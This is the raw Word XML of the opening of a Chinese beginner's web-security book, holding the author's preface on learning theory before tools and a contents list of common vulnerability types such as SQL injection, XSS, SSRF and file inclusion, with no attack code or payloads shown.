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3C" w:rsidRDefault="00292A7C" w:rsidP="005F7DA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc489789688"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小白</w:t>
      </w:r>
      <w:r w:rsidR="00836E0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="006D575E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidR="002749EA" w:rsidRPr="009C75BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全入门</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00215F30" w:rsidRPr="0041548A" w:rsidRDefault="00215F30" w:rsidP="00215F30">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00120605">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://www.deelmind.cn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00215F30" w:rsidRPr="00215F30" w:rsidRDefault="00215F30" w:rsidP="00C84C6C">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041548A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主讲</w:t>
      </w:r>
      <w:r w:rsidRPr="0041548A">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7F04">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DeeLMind</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00733ED9" w:rsidRDefault="00782A32" w:rsidP="00F609CC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc489789689"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前言：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00020C91" w:rsidRDefault="00020C91" w:rsidP="00BD240C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004541DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作者是从事网络安全相关行业的一名普通技术人员，在网上有很多喜欢网络安全的小白问我问题，虽然我会有时间讲解一些，但是作者时间不太充裕</w:t>
      </w:r>
      <w:r w:rsidR="009D4F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，女朋友都没找下，也就没有太大的心思去解答这些简单的问题</w:t>
      </w:r>
      <w:r w:rsidR="004541DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，所以就萌生了写一本有关</w:t>
      </w:r>
      <w:r w:rsidR="00054F89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="004541DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全的书籍，此书只针对入门</w:t>
      </w:r>
      <w:r w:rsidR="00054F89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="004541DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全的同学，从这本书里面可以学到相关的理论知识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004541DE" w:rsidRDefault="004541DE" w:rsidP="00BD240C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作者也是从小白过来的，所以明白刚起步的小伙伴的困惑，这方面资料网上也有但是，都是</w:t>
      </w:r>
      <w:r w:rsidR="000E4713">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>讲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>些是什么，很少有讲解为什么，以至于很多小白只会用别人的工具，来进行安全相关的实验，反而害了自己。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782A32" w:rsidRDefault="004541DE" w:rsidP="00BD240C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>知其然，之其所以然，</w:t>
      </w:r>
      <w:r w:rsidR="00576EFC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>授之以鱼不如授之以渔，</w:t>
      </w:r>
      <w:r w:rsidR="006B0924">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这本书会讲解</w:t>
      </w:r>
      <w:r w:rsidR="006D575E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="006B0924">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidR="001554B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的主流漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00E44AF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>还有相关软件的使用方法。</w:t>
      </w:r>
      <w:r w:rsidR="00CE72D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是一切都是以</w:t>
      </w:r>
      <w:r w:rsidR="00CE72D4" w:rsidRPr="00A46888">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>理论</w:t>
      </w:r>
      <w:r w:rsidR="00CE72D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为龙头，因为只有明白了相关理论知识才可用举一反三。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02CF" w:rsidRDefault="00DA02CF" w:rsidP="00BD240C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>举个例子，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注入只有你知道产生这个漏洞的原因，那么你才可以去构造相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区进行攻击（这些名词会在后面仔细讲解）如果你连这些漏洞产生的原因都不明白，那么也就谈不上构造，绕过了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782A32" w:rsidRPr="00424875" w:rsidRDefault="001B31C5" w:rsidP="00BD240C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>作者认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全这方面虽然没有二进制学习的难，但是会学的很多，所以没有毅力和没有兴趣的小伙伴就可以撤退了，如果你还想接着学习，那么</w:t>
      </w:r>
      <w:r w:rsidR="00A97090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恭喜你，前途无量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00365AB5" w:rsidRDefault="00365AB5" w:rsidP="00365AB5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc489789690"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>针对学者</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00B8193C" w:rsidRDefault="00424875" w:rsidP="00EA432F">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此书针对的是零基础的小白和不明白最基本安全理论的“高手”，如果你想有一个质的变化，那么理论基础是必须具备的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B87" w:rsidRDefault="00236B87" w:rsidP="00236B87">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全科普</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62FD7" w:rsidRDefault="002456AC" w:rsidP="00E62FD7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r w:rsidR="00E62FD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62FD7" w:rsidRDefault="002456AC" w:rsidP="00E62FD7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为什么需要它</w:t>
      </w:r>
      <w:r w:rsidR="00E62FD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62FD7" w:rsidRDefault="002456AC" w:rsidP="00E62FD7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么样学习它</w:t>
      </w:r>
      <w:r w:rsidR="00E62FD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B6ED2" w:rsidRDefault="002456AC" w:rsidP="00DF662C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是如何教授</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全的</w:t>
      </w:r>
      <w:r w:rsidR="00E62FD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432B28" w:rsidRDefault="00432B28" w:rsidP="00432B28">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要的基础知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00432B28" w:rsidRDefault="00DC5D83" w:rsidP="00DC5D83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页前端语言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t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5D83" w:rsidRDefault="00DC5D83" w:rsidP="00DC5D83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站后端语言（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php,python</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5D83" w:rsidRDefault="00DC5D83" w:rsidP="00DC5D83">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql,sqlserver</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0086229D" w:rsidRPr="0086229D" w:rsidRDefault="0086229D" w:rsidP="0086229D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其它奇葩知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00026F3E" w:rsidRPr="00026F3E" w:rsidRDefault="003D4A77" w:rsidP="00EA432F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc489789691"/>
      <w:r w:rsidRPr="006D2FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞分类：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="003417F2" w:rsidRDefault="006D575E" w:rsidP="005453A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="1050"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc489789692"/>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="003417F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="002C6328" w:rsidRDefault="0073089F" w:rsidP="00EE67CA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_SQL" w:history="1">
        <w:r w:rsidR="009901F8" w:rsidRPr="00383303">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>SQL注入</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009901F8" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_XSS漏洞" w:history="1">
        <w:r w:rsidR="009901F8" w:rsidRPr="00043000">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>XSS攻击</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002F490D" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_CSRF漏洞" w:history="1">
        <w:r w:rsidR="002F490D" w:rsidRPr="00043000">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>CSRF攻击</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00391B9E" w:rsidRDefault="0073089F" w:rsidP="005453A7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_SSRF漏洞" w:history="1">
        <w:r w:rsidR="00CB4688" w:rsidRPr="00043000">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>SSRF攻击</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC441D" w:rsidRPr="00BC441D" w:rsidRDefault="0073089F" w:rsidP="00BC441D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_XXE漏洞" w:history="1">
        <w:r w:rsidR="00BC441D" w:rsidRPr="001B1C0A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>XXE漏洞</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00391B9E" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_信息泄露" w:history="1">
        <w:r w:rsidR="00391B9E" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>信息泄露</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00391B9E" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_目录遍历" w:history="1">
        <w:r w:rsidR="00391B9E" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>目录遍历</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0035728E" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_命令执行" w:history="1">
        <w:r w:rsidR="0035728E" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>命令执行</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0035728E" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_文件包含" w:history="1">
        <w:r w:rsidR="0035728E" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>文件包含</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E0317D" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_逻辑漏洞" w:history="1">
        <w:r w:rsidR="00E0317D" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>逻辑漏洞</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C863F1" w:rsidRDefault="0073089F" w:rsidP="00996754">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_越权漏洞" w:history="1">
        <w:r w:rsidR="00C863F1" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>越权漏洞</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F3F2D" w:rsidRDefault="0073089F" w:rsidP="001F3F2D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:hyperlink w:anchor="_暴力破解" w:history="1">
        <w:r w:rsidR="001F3F2D" w:rsidRPr="003A7886">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>弱口令</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
